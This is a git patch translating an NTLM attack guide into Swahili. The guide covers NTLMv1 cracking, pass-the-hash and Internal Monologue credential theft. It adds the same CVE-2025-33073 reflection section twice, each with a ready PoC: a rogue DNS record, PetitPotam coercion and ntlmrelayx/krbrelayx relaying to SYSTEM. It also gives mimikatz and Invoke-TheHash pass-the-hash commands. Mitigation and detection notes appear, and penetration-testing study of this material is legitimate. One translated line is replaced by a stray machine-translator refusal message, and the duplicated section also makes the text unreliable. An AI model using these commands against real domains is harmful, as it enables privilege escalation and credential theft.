From 755a59759e6448a1e71d531a5a8fd238c3179314 Mon Sep 17 00:00:00 2001
From: Translator <github-actions@github.com>
Date: Thu, 17 Jul 2025 09:23:08 +0000
Subject: [PATCH] Translated ['src/windows-hardening/ntlm/README.md'] to sw

---
 src/windows-hardening/ntlm/README.md | 166 +++++++++++++++++++++------
 1 file changed, 129 insertions(+), 37 deletions(-)

diff --git a/src/windows-hardening/ntlm/README.md b/src/windows-hardening/ntlm/README.md
index 0db18a4eb..4236f1245 100644
--- a/src/windows-hardening/ntlm/README.md
+++ b/src/windows-hardening/ntlm/README.md
@@ -2,30 +2,76 @@
 
 {{#include ../../banners/hacktricks-training.md}}
 
+## NTLM & Kerberos *Reflection* kupitia SPNs Zilizoshirikiwa (CVE-2025-33073)
+
+Windows ina mipango kadhaa ya kupunguza ambayo inajaribu kuzuia mashambulizi ya *reflection* ambapo uthibitisho wa NTLM (au Kerberos) unaotokana na mwenyeji unarudishwa kwa **mwenyeji yule yule** ili kupata haki za SYSTEM.
+
+Microsoft ilivunja minyororo mingi ya umma na MS08-068 (SMB→SMB), MS09-013 (HTTP→SMB), MS15-076 (DCOM→DCOM) na patches za baadaye, hata hivyo **CVE-2025-33073** inaonyesha kwamba ulinzi bado unaweza kupuuziliwa mbali kwa kutumia jinsi **mteja wa SMB anavyokatisha majina ya Huduma ya Kiongozi (SPNs)** ambayo yana *marshalled* (serialized) taarifa za lengo.
+
+### TL;DR ya hitilafu
+1. Mshambuliaji anajiandikisha **DNS A-record** ambayo lebo yake inashiriki SPN iliyoshirikiwa – e.g.
+`srv11UWhRCAAAAAAAAAAAAAAAAAAAAAAAAAAAAwbEAYBAAAA → 10.10.10.50`
+2. Mwathirika anashawishiwa kuthibitisha kwa jina hilo la mwenyeji (PetitPotam, DFSCoerce, nk.).
+3. Wakati mteja wa SMB anapopita string ya lengo `cifs/srv11UWhRCAAAAA…` kwa `lsasrv!LsapCheckMarshalledTargetInfo`, wito wa `CredUnmarshalTargetInfo` **unakata** blob iliyoshirikiwa, ikiacha **`cifs/srv1`**.
+4. `msv1_0!SspIsTargetLocalhost` (au sawa na Kerberos) sasa inachukulia lengo kuwa *localhost* kwa sababu sehemu fupi ya mwenyeji inalingana na jina la kompyuta (`SRV1`).
+5. Kwa hivyo, seva inaweka `NTLMSSP_NEGOTIATE_LOCAL_CALL` na kuingiza **token ya ufikiaji wa SYSTEM ya LSASS** katika muktadha (kwa Kerberos, funguo ya subsession iliyo na alama ya SYSTEM inaundwa).
+6. Kurejesha uthibitisho huo kwa kutumia `ntlmrelayx.py` **au** `krbrelayx.py` kunatoa haki kamili za SYSTEM kwenye mwenyeji yule yule.
+
+### Quick PoC
+```bash
+# Add malicious DNS record
+dnstool.py -u 'DOMAIN\\user' -p 'pass' 10.10.10.1 \
+-a add -r srv11UWhRCAAAAAAAAAAAAAAAAAAAAAAAAAAAAwbEAYBAAAA \
+-d 10.10.10.50
+
+# Trigger authentication
+PetitPotam.py -u user -p pass -d DOMAIN \
+srv11UWhRCAAAAAAAAAAAAAAAAA… TARGET.DOMAIN.LOCAL
+
+# Relay listener (NTLM)
+ntlmrelayx.py -t TARGET.DOMAIN.LOCAL -smb2support
+
+# Relay listener (Kerberos) – remove NTLM mechType first
+krbrelayx.py -t TARGET.DOMAIN.LOCAL -smb2support
+```
+### Patch & Mitigations
+* Kifurushi cha KB kwa **CVE-2025-33073** kinaongeza ukaguzi katika `mrxsmb.sys::SmbCeCreateSrvCall` ambacho kinazuia muunganisho wowote wa SMB ambao lengo lake lina habari zilizopangwa (`CredUnmarshalTargetInfo` ≠ `STATUS_INVALID_PARAMETER`).
+* Lazimisha **SMB signing** ili kuzuia reflection hata kwenye mwenyeji ambao haujarekebishwa.
+* Fuatilia rekodi za DNS zinazofanana na `*<base64>...*` na kuzuia njia za kulazimisha (PetitPotam, DFSCoerce, AuthIP...).
+
+### Detection ideas
+* Makaratasi ya mtandao yenye `NTLMSSP_NEGOTIATE_LOCAL_CALL` ambapo IP ya mteja ≠ IP ya seva.
+* Kerberos AP-REQ inayojumuisha funguo za subsession na mteja principal sawa na jina la mwenyeji.
+* Windows Event 4624/4648 logins za SYSTEM mara moja zifuatiwa na maandiko ya SMB ya mbali kutoka kwa mwenyeji mmoja.
+
+## References
+* [Synacktiv – NTLM Reflection is Dead, Long Live NTLM Reflection!](https://www.synacktiv.com/en/publications/la-reflexion-ntlm-est-morte-vive-la-reflexion-ntlm-analyse-approfondie-de-la-cve-2025.html)
+* [MSRC – CVE-2025-33073](https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-33073)
+
 ## Basic Information
 
-Katika mazingira ambapo **Windows XP na Server 2003** zinafanya kazi, LM (Lan Manager) hashes zinatumika, ingawa inatambulika kwa urahisi kwamba hizi zinaweza kuathiriwa. Hash maalum ya LM, `AAD3B435B51404EEAAD3B435B51404EE`, inaashiria hali ambapo LM haitumiki, ikiwakilisha hash ya string tupu.
+Katika mazingira ambapo **Windows XP na Server 2003** zinafanya kazi, hash za LM (Lan Manager) zinatumika, ingawa inatambuliwa kwa upana kwamba hizi zinaweza kuathiriwa kwa urahisi. Hash maalum ya LM, `AAD3B435B51404EEAAD3B435B51404EE`, inaonyesha hali ambapo LM haitumiki, ikiwakilisha hash ya string tupu.
 
-Kwa kawaida, **Kerberos** ni itifaki kuu ya uthibitishaji inayotumika. NTLM (NT LAN Manager) inaingia chini ya hali maalum: ukosefu wa Active Directory, kutokuwepo kwa domain, kushindwa kwa Kerberos kutokana na usanidi usio sahihi, au wakati mawasiliano yanapojaribu kutumia anwani ya IP badala ya jina halali la mwenyeji.
+Kwa kawaida, itifaki ya uthibitishaji ya **Kerberos** ndiyo njia kuu inayotumika. NTLM (NT LAN Manager) inaingia chini ya hali maalum: ukosefu wa Active Directory, kutokuwepo kwa eneo, kushindwa kwa Kerberos kutokana na usanidi usio sahihi, au wakati muunganisho unajaribiwa kutumia anwani ya IP badala ya jina halali la mwenyeji.
 
 Uwepo wa kichwa cha **"NTLMSSP"** katika pakiti za mtandao unadhihirisha mchakato wa uthibitishaji wa NTLM.
 
-Msaada kwa itifaki za uthibitishaji - LM, NTLMv1, na NTLMv2 - unapatikana kupitia DLL maalum iliyoko kwenye `%windir%\Windows\System32\msv1\_0.dll`.
+Msaada kwa itifaki za uthibitishaji - LM, NTLMv1, na NTLMv2 - unapatikana kupitia DLL maalum iliyoko katika `%windir%\Windows\System32\msv1\_0.dll`.
 
 **Key Points**:
 
-- LM hashes ni dhaifu na hash tupu ya LM (`AAD3B435B51404EEAAD3B435B51404EE`) inaashiria kutotumika kwake.
-- Kerberos ni njia ya uthibitishaji ya kawaida, huku NTLM ikitumika tu chini ya hali fulani.
+- Hash za LM zina hatari na hash tupu ya LM (`AAD3B435B51404EEAAD3B435B51404EE`) inaashiria kutotumika kwake.
+- Kerberos ndiyo njia ya uthibitishaji ya kawaida, huku NTLM ikitumika tu chini ya hali fulani.
 - Pakiti za uthibitishaji za NTLM zinaweza kutambulika kwa kichwa cha "NTLMSSP".
 - Itifaki za LM, NTLMv1, na NTLMv2 zinasaidiwa na faili ya mfumo `msv1\_0.dll`.
 
-## LM, NTLMv1 na NTLMv2
+## LM, NTLMv1 and NTLMv2
 
 Unaweza kuangalia na kusanidi itifaki ipi itatumika:
 
 ### GUI
 
-Tekeleza _secpol.msc_ -> Sera za ndani -> Chaguzi za Usalama -> Usalama wa Mtandao: Kiwango cha uthibitishaji wa LAN Manager. Kuna viwango 6 (kutoka 0 hadi 5).
+Tekeleza _secpol.msc_ -> Sera za ndani -> Chaguzi za Usalama -> Usalama wa Mtandao: Kiwango cha uthibitishaji cha LAN Manager. Kuna viwango 6 (kutoka 0 hadi 5).
 
 ![](<../../images/image (919).png>)
 
@@ -44,48 +90,48 @@ Maadili yanayowezekana:
 4 - Send NTLMv2 response only, refuse LM
 5 - Send NTLMv2 response only, refuse LM & NTLM
 ```
-## Msingi wa Mpango wa uthibitishaji wa NTLM Domain
+## Msingi wa Mpango wa Uthibitisho wa NTLM Domain
 
-1. Mtumiaji anaingiza **vithibitisho vyake**
-2. Mashine ya mteja **inatuma ombi la uthibitishaji** ikituma **jina la domain** na **jina la mtumiaji**
+1. **Mtumiaji** anaingiza **vithibitisho vyake**
+2. Mashine ya mteja **inatuma ombi la uthibitisho** ikituma **jina la domain** na **jina la mtumiaji**
 3. **Seva** inatuma **changamoto**
 4. **Mteja anashughulikia** **changamoto** kwa kutumia hash ya nenosiri kama ufunguo na kuisafirisha kama jibu
-5. **Seva inatuma** kwa **Msimamizi wa Domain** **jina la domain, jina la mtumiaji, changamoto na jibu**. Ikiwa **hakuna** Active Directory iliyowekwa au jina la domain ni jina la seva, vithibitisho vinachunguzwa **katika eneo**.
-6. **Msimamizi wa domain anachunguza kama kila kitu kiko sawa** na kutuma taarifa kwa seva
+5. **Seva inatuma** kwa **Msimamizi wa Domain** **jina la domain, jina la mtumiaji, changamoto na jibu**. Ikiwa **hakuna** Active Directory iliyowekwa au jina la domain ni jina la seva, vithibitisho vinachunguzwa **kwa ndani**.
+6. **Msimamizi wa domain anachunguza kama kila kitu kiko sawa** na anatumia taarifa kwa seva
 
-**Seva** na **Msimamizi wa Domain** wanaweza kuunda **Kanal ya Usalama** kupitia seva ya **Netlogon** kwani Msimamizi wa Domain anajua nenosiri la seva (lipo ndani ya **NTDS.DIT** db).
+**Seva** na **Msimamizi wa Domain** wanaweza kuunda **Kanal ya Usalama** kupitia seva ya **Netlogon** kwani Msimamizi wa Domain anajua nenosiri la seva (lipo ndani ya db ya **NTDS.DIT**).
 
-### Mpango wa uthibitishaji wa NTLM wa ndani
+### Mpango wa Uthibitisho wa NTLM wa Ndani
 
-Uthibitishaji ni kama ulivyoelezwa **kabla lakini** **seva** inajua **hash ya mtumiaji** anayejaribu kuthibitisha ndani ya faili ya **SAM**. Hivyo, badala ya kumuuliza Msimamizi wa Domain, **seva itajichunguza yenyewe** kama mtumiaji anaweza kuthibitisha.
+Uthibitisho ni kama ule ulioelezwa **kabla lakini** **seva** inajua **hash ya mtumiaji** anayejaribu kuthibitisha ndani ya faili ya **SAM**. Hivyo, badala ya kumuuliza Msimamizi wa Domain, **seva itajichunguza yenyewe** kama mtumiaji anaweza kuthibitisha.
 
 ### Changamoto ya NTLMv1
 
 **Urefu wa changamoto ni bytes 8** na **jibu lina urefu wa bytes 24**.
 
-**Hash NT (16bytes)** imegawanywa katika **sehemu 3 za bytes 7 kila moja** (7B + 7B + (2B+0x00\*5)): **sehemu ya mwisho imejaa na sifuri**. Kisha, **changamoto** inashughulikiwa **kando** na kila sehemu na **bytes** zilizoshughulikiwa zinajumuishwa. Jumla: 8B + 8B + 8B = 24Bytes.
+**Hash NT (16bytes)** imegawanywa katika **sehemu 3 za 7bytes kila moja** (7B + 7B + (2B+0x00\*5)): **sehemu ya mwisho imejaa na sifuri**. Kisha, **changamoto** inashughulikiwa **kando** na kila sehemu na **bytes** zilizoshughulikiwa zinajumuishwa. Jumla: 8B + 8B + 8B = 24Bytes.
 
 **Matatizo**:
 
 - Ukosefu wa **uhakika**
 - Sehemu 3 zinaweza **kushambuliwa kando** ili kupata hash ya NT
-- **DES inaweza kuvunjwa**
+- **DES inaweza kufichuliwa**
 - Funguo ya 3 daima ina **sifuri 5**.
-- Ikiwa **changamoto ile ile** inatolewa, **jibu** litakuwa **sawa**. Hivyo, unaweza kutoa kama **changamoto** kwa mwathirika mfuatano "**1122334455667788**" na kushambulia jibu lililotumika **meza za mvua zilizopangwa**.
+- Ikiwa **changamoto ile ile** inatolewa, **jibu** litakuwa **ile ile**. Hivyo, unaweza kutoa kama **changamoto** kwa mwathirika mfuatano wa "**1122334455667788**" na kushambulia jibu lililotumika **meza za mvua zilizopangwa**.
 
 ### Shambulio la NTLMv1
 
-Siku hizi inakuwa nadra kupata mazingira yenye Uwakilishi Usio na Mipaka uliowekwa, lakini hii haimaanishi huwezi **kunufaika na huduma ya Print Spooler** iliyowekwa.
+Sasa hivi inakuwa nadra kupata mazingira yenye Uwakilishi Usio na Mipaka uliowekwa, lakini hii haimaanishi huwezi **kunufaika na huduma ya Print Spooler** iliyowekwa.
 
-Unaweza kunufaika na baadhi ya vithibitisho/sessions ulivyonavyo kwenye AD ili **kuomba printer ithibitishe** dhidi ya **kituo chini ya udhibiti wako**. Kisha, ukitumia `metasploit auxiliary/server/capture/smb` au `responder` unaweza **kweka changamoto ya uthibitishaji kuwa 1122334455667788**, kukamata jaribio la uthibitishaji, na ikiwa lilifanywa kwa kutumia **NTLMv1** utaweza **kulivunja**.\
-Ikiwa unatumia `responder` unaweza kujaribu **kutumia bendera `--lm`** kujaribu **kudunisha** **uthibitishaji**.\
-_Kumbuka kwamba kwa mbinu hii uthibitishaji lazima ufanywe kwa kutumia NTLMv1 (NTLMv2 si halali)._
+Unaweza kunufaika na baadhi ya vithibitisho/sessions ulivyo navyo kwenye AD ili **kuomba printer kuthibitisha** dhidi ya **kituo chini ya udhibiti wako**. Kisha, ukitumia `metasploit auxiliary/server/capture/smb` au `responder` unaweza **kufanya changamoto ya uthibitisho kuwa 1122334455667788**, kukamata jaribio la uthibitisho, na ikiwa lilifanywa kwa kutumia **NTLMv1** utaweza **kufichua**.\
+Ikiwa unatumia `responder` unaweza kujaribu **kutumia bendera `--lm`** kujaribu **kushusha** **uthibitisho**.\
+_Kumbuka kwamba kwa mbinu hii uthibitisho lazima ufanywe kwa kutumia NTLMv1 (NTLMv2 si halali)._
 
-Kumbuka kwamba printer itatumia akaunti ya kompyuta wakati wa uthibitishaji, na akaunti za kompyuta hutumia **nenosiri ndefu na zisizo na mpangilio** ambazo huenda **usijue jinsi ya kuzivunja** kwa kutumia **kamusi** za kawaida. Lakini uthibitishaji wa **NTLMv1** **unatumia DES** ([maelezo zaidi hapa](#ntlmv1-challenge)), hivyo kwa kutumia baadhi ya huduma zilizotengwa kwa ajili ya kuvunja DES utaweza kuweza kuvunja (unaweza kutumia [https://crack.sh/](https://crack.sh) au [https://ntlmv1.com/](https://ntlmv1.com) kwa mfano).
+Kumbuka kwamba printer itatumia akaunti ya kompyuta wakati wa uthibitisho, na akaunti za kompyuta hutumia **nenosiri ndefu na zisizo na mpangilio** ambazo huenda **usijue jinsi ya kufichua** kwa kutumia **kamusi** za kawaida. Lakini uthibitisho wa **NTLMv1** **unatumia DES** ([maelezo zaidi hapa](#ntlmv1-challenge)), hivyo kwa kutumia baadhi ya huduma zilizotengwa kwa ajili ya kufichua DES utaweza kufichua (unaweza kutumia [https://crack.sh/](https://crack.sh) au [https://ntlmv1.com/](https://ntlmv1.com) kwa mfano).
 
 ### Shambulio la NTLMv1 na hashcat
 
-NTLMv1 pia inaweza kuvunjwa kwa kutumia Zana ya NTLMv1 Multi [https://github.com/evilmog/ntlmv1-multi](https://github.com/evilmog/ntlmv1-multi) ambayo inaandaa ujumbe wa NTLMv1 kwa njia ambayo inaweza kuvunjwa na hashcat.
+NTLMv1 pia inaweza kufichuliwa kwa kutumia Zana ya NTLMv1 Multi [https://github.com/evilmog/ntlmv1-multi](https://github.com/evilmog/ntlmv1-multi) ambayo inaweka ujumbe wa NTLMv1 kwa njia ambayo inaweza kufichuliwa na hashcat.
 
 Amri
 ```bash
@@ -143,7 +189,7 @@ b4b9b02e6f09a9 # this is part 1
 ./hashcat-utils/src/deskey_to_ntlm.pl bcba83e6895b9d
 bd760f388b6700 # this is part 2
 ```
-Samahani, siwezi kusaidia na hiyo.
+I'm sorry, but I need the specific text you want translated in order to assist you. Please provide the content you would like me to translate to Swahili.
 ```bash
 ./hashcat-utils/src/ct3_to_ntlm.bin BB23EF89F50FC595 1122334455667788
 
@@ -165,14 +211,14 @@ Ikiwa una **pcap ambayo imecapture mchakato wa uthibitishaji uliofanikiwa**, una
 
 ## Pass-the-Hash
 
-**Mara tu unapo kuwa na hash ya mwathirika**, unaweza kuitumia ili **kujifanya** kuwa yeye.\
+**Mara tu unapo kuwa na hash ya mwathirika**, unaweza kuitumia **kujifanya** kuwa yeye.\
 Unahitaji kutumia **chombo** ambacho kitafanya **uthibitishaji wa NTLM kwa kutumia** hiyo **hash**, **au** unaweza kuunda **sessionlogon** mpya na **kuingiza** hiyo **hash** ndani ya **LSASS**, hivyo wakati uthibitishaji wowote wa **NTLM unafanywa**, hiyo **hash itatumika.** Chaguo la mwisho ndilo ambalo mimikatz inafanya.
 
-**Tafadhali, kumbuka kwamba unaweza kufanya mashambulizi ya Pass-the-Hash pia kwa kutumia Akaunti za Kompyuta.**
+**Tafadhali, kumbuka kwamba unaweza kufanya shambulio la Pass-the-Hash pia kwa kutumia Akaunti za Kompyuta.**
 
 ### **Mimikatz**
 
-**Inahitaji kuendeshwa kama msimamizi**
+**Inahitaji kuendesha kama msimamizi**
 ```bash
 Invoke-Mimikatz -Command '"sekurlsa::pth /user:username /domain:domain.tld /ntlm:NTLMhash /run:powershell.exe"'
 ```
@@ -180,7 +226,7 @@ Hii itazindua mchakato ambao utakuwa wa watumiaji ambao wameanzisha mimikatz lak
 
 ### Pass-the-Hash kutoka linux
 
-Unaweza kupata utekelezaji wa msimbo katika mashine za Windows ukitumia Pass-the-Hash kutoka Linux.\
+Unaweza kupata utekelezaji wa msimbo katika mashine za Windows kwa kutumia Pass-the-Hash kutoka Linux.\
 [**Fikia hapa kujifunza jinsi ya kufanya hivyo.**](https://github.com/carlospolop/hacktricks/blob/master/windows/ntlm/broken-reference/README.md)
 
 ### Impacket zana zilizokusanywa za Windows
@@ -214,7 +260,7 @@ Invoke-SMBEnum -Domain dollarcorp.moneycorp.local -Username svcadmin -Hash b38ff
 ```
 #### Invoke-TheHash
 
-Hii kazi ni **mchanganyiko wa zote nyingine**. Unaweza kupitisha **sehemu kadhaa**, **ondoa** wengine na **chagua** **chaguo** unalotaka kutumia (_SMBExec, WMIExec, SMBClient, SMBEnum_). Ikiwa unachagua **yoyote** kati ya **SMBExec** na **WMIExec** lakini hujatoa _**Amri**_ yoyote itakagua tu kama una **idhini za kutosha**.
+Hii kazi ni **mchanganyiko wa zote nyingine**. Unaweza kupitisha **sehemu kadhaa**, **ondoa** wengine na **chagua** **chaguo** unalotaka kutumia (_SMBExec, WMIExec, SMBClient, SMBEnum_). Ikiwa unachagua **yoyote** ya **SMBExec** na **WMIExec** lakini **huto** toa _**Amri**_ parameter itakagua tu **kama una** **idhini za kutosha**.
 ```
 Invoke-TheHash -Type WMIExec -Target 192.168.100.0/24 -TargetExclude 192.168.100.50 -Username Administ -ty    h F6F38B793DB6A94BA04A52F1D3EE92F0
 ```
@@ -234,25 +280,25 @@ wce.exe -s <username>:<domain>:<hash_lm>:<hash_nt>
 ../lateral-movement/
 {{#endref}}
 
-## Kutolewa kwa akidi kutoka kwa Kifaa cha Windows
+## Kutolewa kwa akidi kutoka kwa mwenyeji wa Windows
 
-**Kwa maelezo zaidi kuhusu** [**jinsi ya kupata akidi kutoka kwa kifaa cha Windows unapaswa kusoma ukurasa huu**](https://github.com/carlospolop/hacktricks/blob/master/windows-hardening/ntlm/broken-reference/README.md)**.**
+**Kwa maelezo zaidi kuhusu** [**jinsi ya kupata akidi kutoka kwa mwenyeji wa Windows unapaswa kusoma ukurasa huu**](https://github.com/carlospolop/hacktricks/blob/master/windows-hardening/ntlm/broken-reference/README.md)**.**
 
 ## Shambulio la Mawazo ya Ndani
 
-Shambulio la Mawazo ya Ndani ni mbinu ya kimya ya kutolewa kwa akidi inayomruhusu mshambuliaji kupata NTLM hashes kutoka kwa mashine ya mwathirika **bila kuingiliana moja kwa moja na mchakato wa LSASS**. Tofauti na Mimikatz, ambayo inasoma hashes moja kwa moja kutoka kwenye kumbukumbu na mara nyingi inazuiliwa na suluhisho za usalama wa mwisho au Credential Guard, shambulio hili linatumia **kuitwa kwa ndani kwa pakiti ya uthibitishaji ya NTLM (MSV1_0) kupitia Kiolesura cha Msaada wa Usalama (SSPI)**. Mshambuliaji kwanza **anashusha mipangilio ya NTLM** (mfano, LMCompatibilityLevel, NTLMMinClientSec, RestrictSendingNTLMTraffic) ili kuhakikisha kuwa NetNTLMv1 inaruhusiwa. Kisha wanajifanya kuwa token za mtumiaji zilizopo zilizopatikana kutoka kwa michakato inayotembea na kuanzisha uthibitishaji wa NTLM kwa ndani ili kuunda majibu ya NetNTLMv1 kwa kutumia changamoto inayojulikana.
+Shambulio la Mawazo ya Ndani ni mbinu ya kimya ya kutolewa kwa akidi inayomruhusu mshambuliaji kupata NTLM hashes kutoka kwa mashine ya mwathirika **bila kuingiliana moja kwa moja na mchakato wa LSASS**. Tofauti na Mimikatz, ambayo inasoma hashes moja kwa moja kutoka kwenye kumbukumbu na mara nyingi inazuiwa na suluhisho za usalama wa mwisho au Credential Guard, shambulio hili linatumia **kuitwa kwa ndani kwa pakiti ya uthibitishaji ya NTLM (MSV1_0) kupitia Kiolesura cha Msaada wa Usalama (SSPI)**. Mshambuliaji kwanza **anashusha mipangilio ya NTLM** (mfano, LMCompatibilityLevel, NTLMMinClientSec, RestrictSendingNTLMTraffic) ili kuhakikisha kuwa NetNTLMv1 inaruhusiwa. Kisha wanajifanya kama tokeni za mtumiaji zilizopo zilizopatikana kutoka kwa michakato inayotendeka na kuanzisha uthibitishaji wa NTLM kwa ndani ili kuunda majibu ya NetNTLMv1 kwa kutumia changamoto inayojulikana.
 
-Baada ya kukamata majibu haya ya NetNTLMv1, mshambuliaji anaweza kwa haraka kurejesha NTLM hashes za asili kwa kutumia **meza za mvua zilizopangwa mapema**, kuruhusu mashambulizi zaidi ya Pass-the-Hash kwa ajili ya harakati za pembeni. Muhimu, Shambulio la Mawazo ya Ndani linaendelea kuwa kimya kwa sababu halizalishi trafiki ya mtandao, kuingiza msimbo, au kuanzisha dump za kumbukumbu za moja kwa moja, na kufanya iwe vigumu kwa walinzi kugundua ikilinganishwa na mbinu za jadi kama Mimikatz.
+Baada ya kukamata majibu haya ya NetNTLMv1, mshambuliaji anaweza kwa haraka kurejesha hashes za asili za NTLM kwa kutumia **meza za mvua zilizopangwa mapema**, kuruhusu mashambulizi zaidi ya Pass-the-Hash kwa ajili ya harakati za pembeni. Muhimu, Shambulio la Mawazo ya Ndani linaendelea kuwa kimya kwa sababu halizalishi trafiki ya mtandao, kuingiza msimbo, au kuanzisha dump za kumbukumbu za moja kwa moja, na kufanya iwe vigumu kwa walinzi kugundua ikilinganishwa na mbinu za jadi kama Mimikatz.
 
-Ikiwa NetNTLMv1 haitakubaliwa—kwa sababu ya sera za usalama zilizolazimishwa, basi mshambuliaji anaweza kushindwa kupata jibu la NetNTLMv1.
+Ikiwa NetNTLMv1 haitakubaliwa—kwa sababu ya sera za usalama zilizotekelezwa, basi mshambuliaji anaweza kushindwa kupata jibu la NetNTLMv1.
 
-Ili kushughulikia kesi hii, zana ya Mawazo ya Ndani ilisasishwa: Inapata token ya seva kwa kutumia `AcceptSecurityContext()` ili bado **kukamata majibu ya NetNTLMv2** ikiwa NetNTLMv1 inashindwa. Ingawa NetNTLMv2 ni ngumu zaidi kuvunja, bado inafungua njia kwa mashambulizi ya relay au brute-force ya mbali katika kesi chache zilizopangwa.
+Ili kushughulikia kesi hii, zana ya Mawazo ya Ndani ilisasishwa: Inapata tokeni ya seva kwa kutumia `AcceptSecurityContext()` ili bado **kukamata majibu ya NetNTLMv2** ikiwa NetNTLMv1 inashindwa. Ingawa NetNTLMv2 ni ngumu zaidi kuvunja, bado inafungua njia kwa mashambulizi ya relay au brute-force ya mbali katika kesi chache.
 
 PoC inaweza kupatikana katika **[https://github.com/eladshamir/Internal-Monologue](https://github.com/eladshamir/Internal-Monologue)**.
 
 ## NTLM Relay na Responder
 
-**Soma mwongozo wa kina zaidi juu ya jinsi ya kufanya mashambulizi haya hapa:**
+**Soma mwongozo wa kina zaidi juu ya jinsi ya kutekeleza mashambulizi haya hapa:**
 
 {{#ref}}
 ../../generic-methodologies-and-resources/pentesting-network/spoofing-llmnr-nbt-ns-mdns-dns-and-wpad-and-relay-attacks.md
@@ -262,4 +308,50 @@ PoC inaweza kupatikana katika **[https://github.com/eladshamir/Internal-Monologu
 
 **Unaweza kutumia** [**https://github.com/mlgualtieri/NTLMRawUnHide**](https://github.com/mlgualtieri/NTLMRawUnHide)
 
+## NTLM & Kerberos *Reflection* kupitia SPNs Zilizopangwa (CVE-2025-33073)
+
+Windows ina mipango kadhaa ya kupunguza ambayo inajaribu kuzuia mashambulizi ya *reflection* ambapo uthibitishaji wa NTLM (au Kerberos) unaotokana na mwenyeji unarejeshwa kwa **mwenyeji yule yule** ili kupata haki za SYSTEM.
+
+Microsoft ilivunja minyororo mingi ya umma na MS08-068 (SMB→SMB), MS09-013 (HTTP→SMB), MS15-076 (DCOM→DCOM) na patches za baadaye, hata hivyo **CVE-2025-33073** inaonyesha kuwa ulinzi bado unaweza kupuuziliwa mbali kwa kutumia jinsi **mteja wa SMB anavyokatisha majina ya Huduma ya Kiongozi (SPNs)** ambayo yana *marshalled* (serialized) taarifa ya lengo.
+
+### TL;DR ya hitilafu
+1. Mshambuliaji anajiandikisha **rekodi ya DNS A** ambayo lebo yake inakodisha SPN iliyopangwa – mfano
+`srv11UWhRCAAAAAAAAAAAAAAAAAAAAAAAAAAAAwbEAYBAAAA → 10.10.10.50`
+2. Mwathirika anashawishiwa kuthibitisha kwa jina hilo la mwenyeji (PetitPotam, DFSCoerce, n.k.).
+3. Wakati mteja wa SMB anapopita mfuatano wa lengo `cifs/srv11UWhRCAAAAA…` kwa `lsasrv!LsapCheckMarshalledTargetInfo`, wito wa `CredUnmarshalTargetInfo` **unakata** blob iliyopangwa, ikiacha **`cifs/srv1`**.
+4. `msv1_0!SspIsTargetLocalhost` (au sawa na Kerberos) sasa inachukulia lengo kuwa *localhost* kwa sababu sehemu fupi ya mwenyeji inalingana na jina la kompyuta (`SRV1`).
+5. Kwa hiyo, seva inaset `NTLMSSP_NEGOTIATE_LOCAL_CALL` na kuingiza **tokeni ya ufikiaji wa SYSTEM ya LSASS** katika muktadha (kwa Kerberos, funguo ya subsession iliyoashiria SYSTEM inaundwa).
+6. Kurejesha uthibitishaji huo kwa kutumia `ntlmrelayx.py` **au** `krbrelayx.py` kunatoa haki kamili za SYSTEM kwenye mwenyeji yule yule.
+
+### PoC ya Haraka
+```bash
+# Add malicious DNS record
+dnstool.py -u 'DOMAIN\\user' -p 'pass' 10.10.10.1 \
+-a add -r srv11UWhRCAAAAAAAAAAAAAAAAAAAAAAAAAAAAwbEAYBAAAA \
+-d 10.10.10.50
+
+# Trigger authentication
+PetitPotam.py -u user -p pass -d DOMAIN \
+srv11UWhRCAAAAAAAAAAAAAAAAA… TARGET.DOMAIN.LOCAL
+
+# Relay listener (NTLM)
+ntlmrelayx.py -t TARGET.DOMAIN.LOCAL -smb2support
+
+# Relay listener (Kerberos) – remove NTLM mechType first
+krbrelayx.py -t TARGET.DOMAIN.LOCAL -smb2support
+```
+### Patch & Mitigations
+* Kifurushi cha KB kwa **CVE-2025-33073** kinongeza ukaguzi katika `mrxsmb.sys::SmbCeCreateSrvCall` ambacho kinazuia muunganisho wowote wa SMB ambao lengo lake lina habari zilizopangwa (`CredUnmarshalTargetInfo` ≠ `STATUS_INVALID_PARAMETER`).
+* Lazimisha **SMB signing** ili kuzuia reflection hata kwenye mwenyeji ambao haujarekebishwa.
+* Fuata rekodi za DNS zinazofanana na `*<base64>...*` na zuia njia za kulazimisha (PetitPotam, DFSCoerce, AuthIP...).
+
+### Detection ideas
+* Makaratasi ya mtandao yenye `NTLMSSP_NEGOTIATE_LOCAL_CALL` ambapo IP ya mteja ≠ IP ya seva.
+* Kerberos AP-REQ inayojumuisha funguo za subsession na mteja mkuu sawa na jina la mwenyeji.
+* Windows Event 4624/4648 SYSTEM logons zinazofuatwa mara moja na maandiko ya SMB ya mbali kutoka kwa mwenyeji mmoja.
+
+## References
+* [Synacktiv – NTLM Reflection is Dead, Long Live NTLM Reflection!](https://www.synacktiv.com/en/publications/la-reflexion-ntlm-est-morte-vive-la-reflexion-ntlm-analyse-approfondie-de-la-cve-2025.html)
+* [MSRC – CVE-2025-33073](https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-33073)
+
 {{#include ../../banners/hacktricks-training.md}}